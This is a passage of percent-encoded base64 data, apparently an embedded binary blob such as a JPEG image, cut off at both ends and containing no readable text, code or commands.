4%6d%62%45%77%42%52%53%6b%55%41%55%4b%34%72%0a%69%59%4a%48%46%4c%67%2b%6c%4f%48%41%70%63%55%68%58%47%34%47%4b%61%52%78%78%54%38%55%59%71%6b%32%68%70%6b%52%55%48%72%54%47%41%47%41%4f%63%6e%41%71%59%69%6f%6e%4a%51%35%49%2b%58%48%36%31%63%49%75%55%6b%6b%4e%79%73%72%6a%4d%71%4d%0a%4b%54%79%52%6d%6f%5a%4c%32%32%68%63%4a%4a%4b%6f%59%39%42%6d%75%47%38%65%65%4e%42%6f%73%66%32%53%32%59%47%63%63%45%35%35%47%61%38%65%75%2f%45%2b%70%7a%7a%46%6d%75%35%38%6b%35%47%47%36%56%39%54%67%4d%6a%64%57%50%4d%39%44%43%56%64%0a%49%2b%6e%42%4e%45%2f%43%75%70%7a%30%77%63%30%4d%67%49%79%65%6e%71%61%2b%62%39%4b%38%61%36%31%59%54%71%36%7a%79%53%41%64%6e%4f%51%52%58%71%50%68%58%34%6a%32%2b%72%67%57%55%35%43%54%48%71%5a%43%4d%5a%39%71%36%61%2b%51%79%69%74%44%0a%4b%4f%4c%61%64%6a%75%48%67%7a%79%4f%75%4b%70%79%52%45%6b%67%6a%46%58%6f%72%6d%4b%54%43%68%73%6b%63%41%35%34%50%30%6f%6c%54%65%63%4d%4d%44%31%46%65%4a%58%77%56%57%67%39%56%6f%64%31%48%45%4b%65%6a%5a%6b%37%47%53%55%67%39%4b%74%61%0a%62%64%74%62%58%4f%34%4e%77%44%30%70%4a%49%38%5a%4a%36%64%4b%71%73%6d%43%63%6b%67%48%76%56%59%57%75%36%63%6b%37%6d%39%53%43%6d%72%48%6f%4e%6e%64%70%50%43%47%55%67%38%63%31%62%33%41%6a%49%72%68%74%48%31%4d%32%6b%34%56%6d%4a%51%6e%0a%48%4e%64%6e%44%4b%73%71%68%6c%49%77%77%7a%58%33%57%41%78%69%71%77%53%65%35%34%31%65%6b%34%53%30%32%4c%41%49%78%51%44%54%51%6f%39%61%57%76%54%39%44%6e%48%5a%6f%70%42%31%70%61%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%0a%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%45%7a%52%6e%4a%78%54%63%66%57%6c%41%6f%41%57%6d%73%65%4b%63%61%6a%63%34%55%6e%30%47%61%69%70%4c%6c%69%32%4e%4b%37%4d%4c%58%62%30%78%71%49%31%78%67%39%53%65%74%63%6c%4d%77%41%50%75%61%0a%31%64%57%6e%4d%74%77%33%6f%44%57%4b%2b%58%4e%66%44%35%6a%57%63%36%6a%52%36%2b%46%70%71%31%78%71%6a%4a%79%53%63%65%6c%50%2b%37%77%77%77%44%30%78%54%51%4d%44%46%57%4c%61%4c%7a%54%6c%2b%67%36%56%35%55%70%4e%61%48%62%59%66%62%77%41%0a%6e%63%32%63%64%71%73%71%56%44%59%41%34%70%48%59%59%32%4c%32%34%71%57%4b%49%62%65%61%35%35%53%43%34%39%47%42%34%32%69%70%51%69%6e%31%42%70%71%52%41%56%4b%41%41%63%31%7a%79%6e%63%79%63%68%79%5a%35%42%48%46%53%49%43%4d%2f%57%6b%47%0a%42%55%67%48%53%73%4a%4d%79%6b%4b%42%6b%63%30%34%44%46%43%6a%69%6e%34%39%71%7a%33%5a%6b%32%4d%50%53%67%66%53%6e%59%34%6f%41%71%78%58%44%48%46%41%47%61%64%6a%67%30%41%55%43%47%59%70%53%4d%41%6b%63%6d%6e%45%63%55%68%4f%41%61%61%51%0a%30%78%68%4a%78%79%4b%71%33%62%68%49%47%59%6b%2f%4b%43%63%64%71%74%4e%79%4b%70%33%71%48%37%48%4d%63%64%56%49%46%64%57%44%74%37%56%58%46%4a%71%32%70%38%33%65%4e%74%51%4e%39%34%6d%75%70%63%35%56%6e%77%41%44%77%41%4f%4f%4b%35%34%42%0a%74%78%79%63%6a%73%54%57%6c%72%38%4c%51%36%72%63%49%77%79%56%63%67%2f%69%53%61%7a%41%57%32%35%4e%66%71%65%46%39%32%6b%75%55%38%2b%70%4a%4e%32%42%51%78%44%41%73%53%50%51%39%4b%66%46%4f%38%62%4b%34%59%6b%71%51%51%63%39%4b%62%30%48%0a%31%70%41%63%44%43%6a%50%72%58%53%30%37%58%6b%51%34%70%72%51%39%73%38%45%65%4a%68%71%39%71%6c%71%37%6a%7a%6f%67%41%70%7a%7a%69%75%34%74%62%39%5a%63%32%38%6f%2b%63%48%41%50%72%58%7a%6e%34%64%31%46%37%44%56%49%70%49%33%4b%4c%6b%42%0a%73%47%76%65%6f%79%5a%62%53%31%76%49%53%43%68%41%4c%4d%4b%35%4d%58%67%59%34%69%46%30%6a%6a%39%74%4f%6e%4c%52%6d%33%4e%41%54%48%74%42%47%61%6f%54%52%45%4c%74%49%35%72%58%68%6a%57%35%74%66%74%4b%4e%6b%41%41%47%71%55%30%62%48%4a%49%0a%36%31%38%46%6a%73%48%4c%44%79%50%6f%38%44%58%39%70%48%55%7a%48%42%56%4e%67%48%66%4f%65%39%64%44%6f%57%70%6c%47%57%33%6c%59%59%37%45%6e%6d%73%53%52%44%6b%31%43%72%75%6a%68%6c%4a%33%4b%63%2f%68%57%32%42%78%6a%70%79%57%70%72%58%70%0a%4b%61%5a%36%55%6a%42%75%2f%77%42%4b%65%43%61%77%74%45%31%4d%58%61%42%57%50%7a%71%4d%47%74%30%63%69%76%75%4d%4a%58%39%72%42%4d%38%57%70%42%78%64%67%79%63%30%37%4e%4e%37%30%74%64%64%69%62%43%35%6f%42%79%4b%54%74%53%6a%70%51%49%57%0a%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%62%53%6d%6a%74%52%55%39%51%51%30%31%56%76%5a%50%4b%74%32%59%64%68%56%6f%39%44%57%54%72%63%2f%6c%57%6e%4a%36%6e%41%2b%74%63%6d%4f%6e%79%55%37%6c%30%31%0a%65%53%52%78%39%37%4f%5a%5a%58%42%34%79%61%70%4b%43%70%50%65%72%45%35%33%53%5a%49%78%6b%31%48%67%5a%78%58%77%64%65%70%7a%56%47%7a%33%61%53%74%46%41%71%46%79%44%57%67%41%49%6f%77%41%42%6b%31%42%45%6e%49%4f%4f%4b%74%42%64%35%41%49%0a%72%69%71%54%4e%33%73%45%4d%59%7a%6b%39%54%7a%56%6b%4b%51%63%39%68%54%55%41%42%79%54%67%41%59%71%6c%71%65%73%57%6d%6b%32%72%50%64%7a%72%47%4f%32%4f%54%2b%56%47%48%77%38%71%7a%30%52%68%4b%61%52%6f%67%68%52%6b%6e%49%70%79%45%4e%79%0a%43%4d%64%78%58%41%74%38%54%39%4c%53%54%59%6a%6c%30%7a%67%6b%72%58%53%61%4e%34%6c%30%33%56%34%77%31%72%4d%43%33%63%45%59%50%35%56%31%56%63%71%72%52%6a%64%6f%77%64%61%50%51%36%45%41%56%4b%4d%41%59%34%71%76%47%53%34%79%42%2b%66%46%0a%53%67%6b%38%31%34%31%57%6e%4b%6d%37%4e%45%74%33%31%4a%56%70%31%4d%42%42%47%4d%38%30%2f%42%72%4f%4b%75%79%51%48%57%6c%41%39%68%51%41%51%63%6e%70%54%73%69%74%47%72%45%74%69%45%55%59%4e%4f%34%7a%78%52%6a%33%6f%35%57%78%58%45%49%34%0a%70%75%4b%6b%50%53%6d%38%55%6c%64%44%54%49%6d%47%4b%68%6b%54%63%70%55%6a%49%49%77%61%73%4d%4d%6a%69%6f%7a%77%4d%59%36%6d%75%6a%44%53%53%71%4a%73%6d%54%75%6d%65%42%2f%45%58%77%36%39%74%71%30%74%7a%45%4d%6f%78%4a%4f%42%58%42%46%43%0a%79%6b%6f%50%6c%48%55%47%76%6f%62%78%50%59%4a%50%4b%30%4d%6f%42%56%2b%68%4e%65%66%70%38%50%58%6d%31%32%4a%59%53%54%62%4d%52%75%35%72%39%50%79%37%33%36%4b%61%5a%35%4d%70%71%4d%37%4d%38%79%59%71%77%4a%55%48%41%36%67%2b%74%4c%6b%45%0a%66%4d%70%56%75%31%65%37%65%4b%66%68%42%61%52%61%4d%30%39%69%35%45%69%70%75%49%41%50%59%5a%4e%65%47%4f%68%69%6c%6b%56%6a%75%5a%57%49%47%52%6a%4e%64%31%32%39%47%61%38%30%65%34%52%6b%6f%79%75%54%30%49%36%56%39%43%2b%45%5a%57%75%76%0a%43%63%4a%50%51%41%64%61%38%43%30%36%78%6c%31%47%39%69%74%34%6b%4c%4d%78%42%49%48%51%66%6a%58%30%4a%6f%74%6f%64%4c%30%43%43%32%50%47%41%4e%32%44%6e%46%64%46%47%44%5a%35%2b%4d%6d%6b%74%44%70%50%44%6a%67%76%4a%45%65%68%48%54%74%55%0a%39%37%62%43%4f%51%6a%31%7a%57%66%34%62%63%50%71%44%59%4f%52%32%72%70%64%51%67%44%49%57%41%35%46%66%50%5a%2f%67%65%61%4e%30%64%75%57%56%6e%62%55%35%61%53%44%35%53%61%70%53%51%35%47%41%53%4d%63%38%56%73%79%4a%6c%57%41%71%6a%4c%47%0a%63%63%44%36%31%38%45%2f%33%63%72%4d%2b%6d%70%79%54%52%56%74%4c%78%72%4f%35%45%71%5a%77%76%55%44%76%58%62%61%5a%71%61%58%71%41%67%6a%4f%4f%6c%63%4f%36%42%44%67%44%49%50%57%6e%57%64%7a%4e%59%33%41%4d%5a%79%75%63%6e%6d%76%6f%63%75%0a%7a%48%32%62%55%57%7a%6c%78%4f%47%35%6c%7a%49%39%48%42%7a%6e%50%57%6e%59%47%4f%74%5a%75%6d%36%69%6c%39%43%43%47%79%77%36%38%56%6f%34%39%36%2b%76%6f%56%6f%31%56%7a%4a%6e%6b%53%54%69%37%4d%4d%44%74%54%67%4b%61%4f%4d%69%6e%41%31%74%0a%66%55%68%4d%57%69%69%69%6d%4d%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%45%6f%48%57%67%38%55%67%37%30%75%6f%4a%43%45%38%47%75%66%38%41%45%62%5a%67%51%5a%37%31%76%39%42%39%61%35%62%78%42%4b%57%6d%45%58%48%41%0a%79%50%65%76%4a%7a%53%64%71%62%4e%38%4f%72%7a%52%7a%7a%6e%71%63%5a%77%61%61%6f%33%47%6c%4a%4f%43%70%41%35%4f%61%64%45%4d%47%76%68%36%6a%54%6b%32%65%36%72%63%75%68%61%69%54%43%67%56%5a%52%50%6d%46%52%4a%6b%4b%4d%43%72%43%45%5a%79%0a%4f%6f%46%63%73%59%75%63%37%45%56%4a%38%73%62%6d%62%72%2b%72%78%61%4e%70%6b%6c%78%4e%30%41%4f%50%72%58%67%48%69%4c%78%48%64%36%78%64%76%4b%38%6a%42%51%54%73%58%50%47%4d%31%36%52%38%56%74%52%4b%57%73%63%41%4f%51%77%35%48%62%36%31%0a%34%32%77%4a%48%58%4a%42%34%7a%58%33%47%55%59%4b%4d%49%33%61%31%50%4a%72%56%6d%33%6f%77%42%44%74%75%55%6e%70%7a%7a%33%71%2f%70%75%73%33%75%6b%33%53%7a%32%73%72%42%31%50%54%50%42%48%65%71%47%4d%48%41%34%39%63%55%6a%45%6c%53%41%42%0a%6e%49%35%72%32%6e%54%6a%4a%4e%4e%48%49%35%75%2b%68%39%48%65%43%76%45%36%36%2f%70%45%62%53%53%44%7a%34%79%53%34%42%35%78%30%72%72%45%4f%55%42%41%78%6b%56%38%2b%2f%44%54%55%78%5a%61%33%4e%45%57%77%73%71%68%51%43%65%42%67%35%79%4b%0a%39%35%74%4a%79%38%51%41%4f%54%37%39%71%2b%51%7a%6e%4c%74%48%4f%4b%30%4f%69%6a%69%4e%65%56%6c%36%50%48%65%70%52%56%64%47%2f%4d%64%61%6c%55%35%4e%66%48%79%58%4c%4b%78%32%39%4c%6b%6d%4d%30%6f%46%41%4f%4b%63%6f%79%4b%75%4b%62%49%59%0a%41%55%70%42%78%51%42%31%6f%35%72%61%4d%53%62%69%59%34%70%70%47%42%6d%70%4d%55%33%47%65%74%54%4b%46%68%70%6a%63%6a%48%53%6f%33%42%5a%76%51%41%56%4b%65%4f%4d%43%6d%4d%4d%6a%30%48%74%57%57%71%61%61%47%72%50%63%78%64%5a%73%6b%75%37%0a%59%34%48%7a%6a%6f%61%35%6a%54%72%32%62%54%72%77%4a%50%7a%67%34%42%49%72%76%4d%41%6e%42%55%45%65%74%5a%75%6f%2b%48%6f%4c%39%44%4e%62%38%53%44%73%50%57%76%76%63%67%78%30%62%4b%45%6d%65%4e%6a%71%55%6b%2b%61%4b%4c%4e%78%72%49%75%39%0a%4d%6b%69%54%47%39%30%4b%67%6e%73%43%4d%47%76%4b%5a%76%68%66%48%50%66%62%76%4e%42%33%6e%63%32%4f%32%61%36%39%62%61%39%73%53%79%75%6a%45%44%6a%70%51%4c%71%56%4d%67%4b%79%73%52%6a%4a%72%37%56%55%6f%79%73%30%65%54%4b%76%55%57%68%53%0a%30%62%77%68%70%57%68%4b%4a%49%51%72%79%67%2f%4d%54%56%2b%37%75%77%51%56%68%47%55%50%33%76%61%6f%47%65%5a%74%71%62%54%6b%38%5a%48%55%2f%57%74%54%54%64%41%75%4a%37%6c%57%5a%43%73%52%36%67%6a%72%57%6e%75%77%52%6c%65%70%56%30%4e%54%0a%77%76%5a%4d%44%35%78%42%41%37%5a%72%71%4c%6b%42%6f%32%42%37%69%6d%57%6c%71%6b%45%51%52%51%51%41%4d%56%4a%4d%4d%6f%66%59%56%34%32%59%79%35%36%62%62%50%63%77%63%48%42%4a%4d%35%6d%51%45%53%4d%4f%32%61%69%61%50%67%38%56%61%6c%49%45%0a%6a%66%57%6f%69%4f%4b%2f%4c%73%59%2f%33%7a%73%66%51%55%5a%50%6c%4d%36%61%49%5a%50%46%55%58%54%61%54%73%42%4b%6e%71%61%31%33%54%4a%71%6e%4e%47%51%43%42%77%44%32%46%45%4a%32%61%61%5a%31%71%58%4d%72%4d%58%53%4e%54%4e%6a%4f%41%42%2b%0a%36%4a%77%78%39%36%37%61%31%75%55%6e%51%4f%72%5a%79%4f%6d%61%38%39%65%4d%72%77%4d%34%37%67%64%36%30%4e%48%31%4f%53%31%75%6c%6a%63%35%55%38%44%4e%66%54%35%62%6a%75%57%30%57%7a%67%78%57%48%36%6f%37%7a%48%55%2b%74%4b%42%55%45%55%75%0a%39%51%77%35%42%47%61%6d%42%50%55%34%78%58%31%74%4f%53%6c%46%4e%48%6b%74%4e%4f%77%2b%69%6b%6f%72%51%42%61%4b%53%67%63%30%41%4c%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%43%47%6b%48%51%30%67%70%52%31%70%64%51%57%77%30%6e%67%56%0a%79%57%75%67%2f%62%53%33%59%44%46%64%59%33%47%54%36%43%75%50%31%70%38%33%44%63%35%34%72%77%63%34%6c%2b%37%61%4f%72%44%4c%33%6a%46%59%35%63%6e%74%55%73%51%35%71%45%38%35%71%65%4c%74%58%78%55%32%37%73%39%71%4b%30%4c%69%63%44%4e%50%0a%42%4b%37%6a%37%56%48%47%4d%34%46%50%6b%4a%53%4e%7a%77%52%74%72%70%79%32%4b%6e%57%53%61%4f%50%47%79%35%61%62%5a%35%4e%38%54%6b%65%51%78%76%79%51%44%69%76%4d%35%45%47%4d%6b%34%35%46%65%78%2b%4b%39%4e%6e%31%50%53%53%4c%5a%43%38%78%0a%34%78%6a%4f%42%58%47%61%68%38%4f%74%5a%73%4e%4a%4e%38%59%57%4d%49%55%6c%78%6a%4a%72%39%47%70%51%56%4f%6d%72%49%38%4f%6e%56%55%32%30%63%58%2f%47%61%54%4a%47%53%42%6b%35%41%70%7a%41%70%4b%79%6b%45%63%64%44%32%70%41%52%67%45%64%51%0a%61%30%6a%4e%50%64%47%31%6b%61%33%68%65%55%70%34%6b%73%55%48%42%4d%70%42%2f%4b%76%6f%65%77%75%53%6c%79%6d%65%6a%4b%4b%2b%66%66%43%74%73%5a%2f%45%64%6b%46%79%53%30%6d%43%52%32%72%33%69%53%4a%6b%6e%74%30%42%49%49%49%48%46%5a%59%79%0a%68%47%72%52%61%73%63%4d%36%6e%4c%55%56%6a%70%56%42%47%54%2f%41%48%75%6c%54%4a%77%51%44%55%43%74%38%77%42%37%41%56%4d%68%35%72%38%72%78%39%4c%32%64%64%70%48%75%55%32%35%51%54%4a%68%31%46%53%70%30%71%4a%54%7a%55%6b%64%59%30%32%72%0a%32%4b%6c%6f%50%55%5a%42%70%64%75%61%56%52%77%61%57%75%2b%46%4e%4e%47%54%59%6d%4b%62%67%56%4a%69%6d%6b%59%46%4b%64%4e%57%45%6d%79%49%6a%6d%6d%75%4d%6a%46%53%55%30%35%39%4b%35%5a%77%53%4c%69%33%65%35%58%50%41%4b%39%36%57%4b%63%78%0a%53%67%4b%75%31%54%31%70%7a%48%6e%70%55%54%5a%77%52%33%4e%56%67%73%58%4f%68%56%54%57%78%55%6f%52%6d%72%4d%31%57%67%68%75%59%78%6c%56%59%48%72%6d%71%7a%61%46%59%75%63%74%62%4b%54%39%54%56%57%32%75%6a%41%77%42%4a%78%57%72%62%33%61%0a%4f%4f%6f%2f%47%76%30%44%41%35%73%71%6b%56%64%6e%6e%31%73%46%47%39%30%69%47%48%52%37%4b%49%67%4c%41%6f%37%31%66%45%59%58%41%55%44%61%50%51%55%62%77%63%2f%4d%4b%50%4e%56%52%31%46%65%71%38%58%42%71%37%6b%5a%51%6f%71%47%79%48%44%50%0a%63%59%46%56%72%71%56%55%6a%59%41%38%34%70%74%78%65%72%48%33%46%59%31%7a%63%74%50%4a%6a%4a%41%39%71%38%54%4d%38%79%67%6f%4f%4b%5a%31%30%71%4c%76%63%69%62%4c%53%4d%66%65%6a%67%69%6c%55%63%45%55%59%77%61%2f%50%36%38%2b%61%62%61%50%0a%53%68%6f%72%44%43%6f%4e%56%35%59%7a%6e%70%56%74%68%78%55%52%42%49%72%4f%45%6d%6d%62%52%6c%71%5a%73%73%58%4a%37%56%57%61%4a%68%2b%38%44%41%45%48%69%74%4e%30%79%53%43%4b%67%65%49%59%49%72%74%70%59%68%77%6b%72%47%72%74%4a%57%5a%6f%0a%36%4c%72%4c%49%34%74%35%6a%6b%6b%35%42%50%70%58%56%49%34%59%42%6c%35%42%46%65%65%53%4b%59%38%4f%6f%35%42%37%56%31%4f%69%36%69%4a%59%6c%69%4a%2b%59%44%48%4e%66%5a%5a%58%6d%48%4d%6c%46%73%38%72%46%55%45%6e%64%47%2b%4b%4d%30%7a%72%0a%7a%6d%6e%41%35%34%72%36%4f%4d%6b%30%63%41%74%41%6f%6f%46%4d%42%61%4b%4b%4b%59%42%52%52%52%51%41%55%55%55%55%41%4d%46%4c%51%4f%6c%46%4c%7a%45%74%68%6b%68%2b%56%76%70%58%45%61%73%66%39%4b%63%48%72%32%72%74%35%42%38%70%2b%6c%63%4c%0a%71%78%7a%65%74%58%7a%32%63%75%30%54%74%77%69%39%34%7a%78%31%49%71%61%4f%6f%41%66%6d%4e%54%78%39%61%2b%4f%71%61%4d%39%71%4f%78%62%6a%78%6a%6b%34%34%71%7a%48%41%4a%62%4b%59%6b%6b%6e%61%51%4b%71%72%6b%6a%41%36%31%72%61%51%70%65%4f%0a%53%4a%68%6e%49%4e%64%2b%54%32%39%75%72%6e%6e%34%39%4f%55%47%6a%6b%64%48%6b%38%71%2f%45%62%34%34%66%42%42%72%72%39%66%31%47%30%67%38%50%58%62%33%44%49%49%52%47%51%55%49%48%50%46%63%70%71%39%6b%39%6c%71%50%6d%71%6e%4f%37%4f%63%56%0a%4c%64%77%78%61%78%70%7a%32%31%30%41%79%53%44%42%41%4e%66%70%73%61%61%6c%42%4e%48%79%6b%61%76%73%70%4e%4d%2b%63%39%52%6c%52%39%53%6d%6c%6a%43%2b%55%7a%45%6a%42%37%5a%4f%4b%71%72%30%4f%52%6a%50%53%76%54%74%57%2b%46%4c%47%34%4c%57%0a%5a%49%54%71%42%36%55%33%54%50%68%58%50%4a%4b%47%75%35%51%73%61%6b%5a%42%7a%36%31%69%71%62%35%72%57%4f%72%36%33%46%4b%39%79%44%34%57%36%4d%31%31%66%53%58%6a%6f%64%73%53%67%6f%53%4f%2b%65%66%30%72%31%6c%56%4d%2b%6f%70%67%5a%47%51%0a%61%71%61%5a%70%39%72%6f%6c%6f%62%57%31%43%67%67%59%4a%48%65%74%62%51%34%44%50%64%68%79%43%51%76%42%4e%61%56%6f%4b%4e%4e%6f%34%76%61%4b%72%55%56%6a%53%6e%6a%4d%52%79%52%6a%49%34%6f%6a%36%44%36%56%50%71%5a%41%6b%41%78%77%42%56%5a%0a%42%37%31%2b%55%5a%75%72%56%33%59%2b%71%77%36%2f%64%70%46%68%54%7a%6e%4e%53%6f%52%55%53%72%78%31%71%52%4d%44%76%58%6c%30%6e%64%68%49%6e%42%77%4d%47%6c%7a%78%54%46%66%48%41%35%70%78%63%59%36%34%72%31%36%54%56%6a%4b%31%78%63%34%70%0a%43%63%69%6f%32%6d%56%41%53%57%2f%57%71%73%6c%2b%69%67%2f%4d%4d%44%76%6d%68%32%5a%70%47%6e%4a%37%49%74%45%34%70%43%52%69%73%35%39%56%6a%58%50%7a%69%6f%44%71%36%45%38%4d%43%4b%35%70%77%76%73%62%4b%68%4e%39%44%54%63%6b%56%43%58%42%0a%72%50%66%56%55%37%6b%56%43%32%72%52%6e%6f%52%57%44%70%4e%39%44%57%4f%48%6b%74%30%61%54%59%4a%7a%33%70%75%57%58%37%72%45%56%6e%44%55%55%49%34%49%7a%39%61%63%4c%39%54%2f%41%42%44%38%36%30%70%2b%31%68%73%79%6e%68%6d%2b%68%70%43%35%0a%6c%55%59%33%6b%30%6e%32%69%59%6b%2f%4d%61%6f%4c%65%4b%54%6a%50%36%31%4d%74%77%75%4f%74%64%58%31%75%75%6c%61%35%4d%73%50%62%6f%54%4d%7a%50%38%41%65%59%30%4a%67%64%54%2b%6c%52%69%51%45%35%7a%54%39%2b%52%77%52%6d%75%4b%74%57%71%54%0a%33%4a%56%4f%33%51%6b%42%47%66%61%6c%4a%47%52%55%51%59%30%45%6e%50%4e%63%71%54%54%31%42%4c%55%6b%4a%42%48%46%4d%78%6d%6b%7a%52%6d%71%74%72%64%44%32%49%33%41%77%61%68%59%41%35%71%77%51%43%65%65%6c%4d%5a%42%32%71%34%74%33%31%4e%49%0a%79%5a%55%64%4d%39%42%6b%2b%6c%46%72%4b%62%57%34%44%67%34%49%37%56%4d%79%45%44%49%71%4b%52%41%56%4f%4f%74%65%6a%67%38%51%36%63%74%47%4b%70%46%53%57%70%32%6c%72%4f%73%73%4b%73%44%6e%49%42%71%77%4d%64%61%35%7a%51%72%73%41%47%4a%6d%0a%35%39%44%58%52%4c%7a%7a%58%33%2b%42%78%43%71%78%52%34%74%61%44%68%4b%77%2b%67%55%6c%4b%76%53%76%51%4d%78%61%4b%4b%4b%59%42%52%52%52%51%41%55%55%55%55%41%4e%48%53%6a%74%69%6a%74%51%65%6c%4b%32%67%6c%73%4d%6c%50%79%48%36%56%77%57%0a%71%73%66%74%54%6e%30%4f%4b%37%79%58%2f%56%74%39%44%58%41%61%6d%63%33%45%6e%2b%38%61%2b%63%7a%70%2b%36%64%75%45%2b%49%70%71%4d%6b%47%70%34%2b%54%7a%55%4b%64%52%55%38%59%77%61%2b%51%71%72%55%39%75%4f%78%61%51%63%5a%42%35%72%53%30%0a%71%58%5a%64%44%63%63%43%73%32%4d%38%56%5a%69%63%49%79%74%6e%76%57%75%41%71%63%6c%56%4d%35%73%52%46%53%69%30%61%2b%71%36%57%6d%6f%51%4e%38%76%4a%47%41%52%31%72%69%37%69%77%75%64%50%66%61%45%49%55%48%67%39%36%39%45%74%5a%68%4c%43%0a%75%43%4f%6c%45%39%6c%44%63%4c%68%30%42%2f%43%76%30%33%41%34%74%53%70%71%35%38%6e%69%38%47%35%53%62%52%35%79%6c%2f%4d%42%6a%66%38%41%58%4e%4b%39%36%38%69%34%33%4c%39%42%33%72%72%5a%2f%43%74%72%49%53%56%47%4d%6d%6f%34%2f%43%4e%71%0a%6e%4f%34%37%71%37%6c%56%6a%65%35%35%2f%77%42%55%6e%31%4f%56%74%59%70%62%36%34%43%49%72%63%6e%6b%69%75%2b%30%79%77%57%7a%74%31%58%48%7a%59%79%61%66%59%36%56%62%32%51%2b%52%42%6e%31%78%56%71%55%68%41%57%48%70%58%48%6a%63%51%6c%42%0a%32%50%52%77%6d%46%55%57%6d%39%7a%44%31%4a%38%7a%6c%51%41%54%55%4b%6e%47%4f%61%61%37%6d%57%34%64%6a%7a%67%30%71%6b%48%4e%66%6c%6d%59%31%46%4f%73%30%66%53%55%6c%61%4e%69%63%50%78%6a%76%53%37%38%44%6b%6d%71%7a%4f%45%42%4f%63%41%56%0a%52%75%74%51%57%4d%45%62%2b%61%34%61%56%4c%57%35%63%61%4c%6b%7a%54%65%39%53%49%45%6c%68%2b%4e%5a%31%31%72%53%49%43%46%49%4a%48%76%57%44%64%33%37%53%74%68%57%4a%34%39%61%71%68%6d%48%4c%63%31%36%45%59%74%49%37%61%65%43%54%31%4e%53%0a%62%56%48%6c%42%77%78%2f%4f%71%6a%33%63%70%42%42%4f%51%66%65%71%70%6d%56%4f%67%35%70%46%4c%53%4d%4d%44%69%72%55%62%6e%5a%48%44%52%69%74%55%54%6d%55%45%48%63%54%2b%46%52%4e%63%41%66%63%7a%56%69%4b%7a%61%51%67%59%36%31%61%62%53%64%0a%71%62%6a%57%38%61%53%74%63%54%6e%43%4c%73%5a%5a%6c%64%68%6b%67%69%6b%77%35%37%6d%72%68%6a%56%51%56%79%4f%4b%6a%34%46%5a%53%53%54%4e%6f%75%4c%57%78%58%49%6c%48%52%6a%54%44%4c%4d%67%4f%53%65%4b%73%74%49%4f%51%4f%74%52%45%68%67%63%0a%31%53%73%78%78%55%57%37%57%49%55%76%35%46%59%68%6a%6a%6d%72%73%65%6f%6b%72%6a%64%2b%74%5a%30%6b%61%45%6e%31%71%75%77%4b%48%67%31%54%70%70%6d%72%6f%4b%53%4f%69%6a%31%4c%42%77%57%2f%57%72%63%65%70%49%63%44%64%2b%74%63%6b%73%78%7a%0a%67%6b%31%4f%4a%63%4c%6b%45%35%72%4a%34%5a%4d%79%6c%68%45%7a%72%30%76%51%52%6b%4d%4d%66%57%6e%69%37%55%6a%68%67%61%34%31%62%32%56%44%6a%4a%78%55%34%31%46%67%42%67%6e%38%36%79%65%44%4d%4a%59%4c%71%64%67%73%79%6b%34%42%36%31%4d%70%0a%42%36%47%75%54%74%4e%54%5a%70%67%43%61%36%53%32%6c%33%6a%4e%63%39%57%6a%79%48%48%56%6f%63%68%59%49%4f%44%69%6b%77%61%66%31%42%70%70%49%46%63%71%64%35%48%4d%74%45%4d%62%67%5a%71%42%68%74%4a%62%72%37%56%5a%4a%7a%55%4d%6f%41%57%74%0a%49%58%55%74%43%34%36%6b%4d%4d%70%67%75%6c%6b%51%34%79%65%66%53%75%31%74%4a%52%4e%41%72%41%67%35%48%4e%63%4d%51%41%41%4f%35%4e%64%64%6f%2b%52%5a%67%45%38%34%72%37%48%4a%4b%72%74%5a%6e%6e%34%79%46%6d%61%66%61%68%61%41%63%69%68%65%0a%68%72%36%32%4c%75%72%6e%6e%50%63%64%52%52%52%54%47%46%46%46%46%41%42%52%52%52%51%41%77%2f%64%6f%39%4b%43%4d%6a%46%47%4f%4b%54%42%62%44%4a%76%39%57%33%30%72%7a%2f%55%7a%6d%35%6b%48%2b%31%58%66%54%6b%65%55%33%30%72%7a%2f%55%54%6d%0a%36%6b%78%2f%65%72%35%72%4f%33%70%59%37%73%48%75%56%68%78%69%72%43%48%6d%6f%43%4f%67%48%57%70%34%77%51%61%2b%52%71%50%55%39%71%47%78%61%6a%55%45%67%47%72%49%47%38%45%45%59%78%30%71%75%76%54%41%36%31%5a%48%4b%34%36%56%67%70%63%73%0a%72%6d%4d%31%63%75%61%64%65%65%54%49%55%63%6b%4c%6e%72%58%51%52%53%71%36%5a%55%67%67%39%36%35%4e%6c%79%75%42%78%6a%76%55%39%76%66%79%32%78%43%38%6c%42%31%4e%66%54%5a%62%6d%71%70%70%4a%73%38%32%74%51%35%6e%6f%64%53%47%42%47%4d%55%0a%75%33%4e%5a%4d%65%72%6f%65%70%41%71%58%2b%31%59%4d%63%50%6b%2b%6d%4b%2b%6b%6a%6d%64%46%78%76%63%34%35%55%48%66%59%76%5a%77%50%51%43%73%76%55%4c%74%65%55%55%39%71%69%75%4e%55%79%43%49%7a%6e%4e%5a%6b%6a%73%35%4c%4e%31%7a%36%31%34%0a%4f%5a%5a%74%46%78%63%59%73%36%61%47%48%61%64%77%48%47%57%39%61%61%38%6f%58%6b%6e%46%4e%6b%6c%56%49%2b%54%57%48%66%36%67%46%55%37%57%35%72%35%68%30%33%56%6c%7a%48%72%59%65%67%35%61%45%2b%6f%61%6c%67%46%56%4f%44%57%42%4c%63%79%53%0a%6b%6a%64%78%39%61%67%6b%75%47%6c%59%6b%6e%4f%61%61%70%42%55%67%44%6d%75%32%6e%52%35%55%65%78%53%77%76%4b%69%32%67%43%41%46%69%44%78%6e%4e%4d%61%64%6d%66%43%6a%35%66%57%71%6f%4c%76%38%6f%36%56%63%68%58%41%32%6b%5a%39%36%30%6b%6b%0a%6b%61%75%50%4b%50%53%49%41%35%66%6e%4e%57%6b%43%41%5a%78%38%76%66%48%57%6f%4e%2b%7a%67%6a%4e%49%5a%47%49%4a%58%6a%32%72%4a%4e%6d%63%6f%75%52%6f%43%39%45%53%37%55%47%44%36%6d%6f%7a%66%54%74%6b%45%35%7a%37%31%52%33%48%71%54%6d%6d%0a%6d%58%48%54%69%74%4f%64%32%73%5a%4c%44%33%64%79%79%38%68%4a%4a%50%57%6f%74%2b%65%39%52%65%59%54%33%70%4d%34%48%57%70%63%62%6d%38%61%61%53%4a%4d%34%35%6f%4c%6b%43%6f%74%